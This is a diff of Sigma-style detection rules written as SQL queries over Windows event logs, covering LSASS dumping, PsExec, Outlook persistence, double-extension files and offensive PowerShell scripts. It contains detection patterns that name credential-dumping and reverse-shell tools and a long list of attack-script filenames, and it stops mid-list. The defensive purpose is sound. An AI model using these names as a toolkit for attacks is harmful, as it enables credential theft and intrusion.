[ + "attack.defense_evasion", + "attack.t1070" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Possible FP during log rotation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' 
ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml" + "filename": "file_delete_win_delete_exchange_powershell_logs.yml" }, { - "title": "Password Protected ZIP File Opened (Email Attachment)", - "id": "571498c8-908e-40b4-910b-d2369159a3da", + "title": "Potential Persistence Via Outlook Form", + "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a new Outlook form which can contain malicious code", + "author": "Tobias Michalski (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1137.003" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Legitimate use of outlook forms" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + "filename": "file_event_win_office_outlook_newform.yml" }, { - "title": "LSASS Access from Non System Account", - "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", - "status": "experimental", - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "SafetyKatz 
Default Dump Filename", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "status": "test", + "description": "Detects default lsass dump filename from SafetyKatz", + "author": "Markus Neis", "tags": [ "attack.credential_access", "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate files with similar filename structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\')" ], - "filename": "win_security_lsass_access_non_system_account.yml" + "filename": "file_event_win_hktl_safetykatz.yml" }, { - "title": "Suspicious PsExec Execution", - "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", - "status": "test", - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "author": "Samir Bousseaden", + "title": "Suspicious Double Extension Files", + "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "status": "experimental", + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that 
windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_psexec.yml" + "filename": "file_event_win_susp_double_extension.yml" }, { - "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "title": "PCRE.NET Package Temp Files", + "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "status": "test", - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. 
Possible Rubeus tries to get a handle to LSA.", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "description": "Detects processes creating temp files related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + "filename": "file_event_win_pcre_net_temp_file.yml" }, { - "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "id": "8400629e-79a9-4737-b387-5db940ab2367", - "status": "test", - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", + "title": "LSASS Process Memory Dump Files", + "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "status": "experimental", + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" + "SELECT * FROM logs WHERE ((EventID 
= '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')))" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml" + "filename": "file_event_win_lsass_dump.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", - "id": "8fe1c584-ee61-444b-be21-e9054b229694", - "status": "experimental", - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "author": "INIT_6", + "title": "Malicious PowerShell Scripts - FileCreation", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "status": "test", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "tags": [ "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND 
RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AzureADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DNSUpdate.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Powermad.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' 